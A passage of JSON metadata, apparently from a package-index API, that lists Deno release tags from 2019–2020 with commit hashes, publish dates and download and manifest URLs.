0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%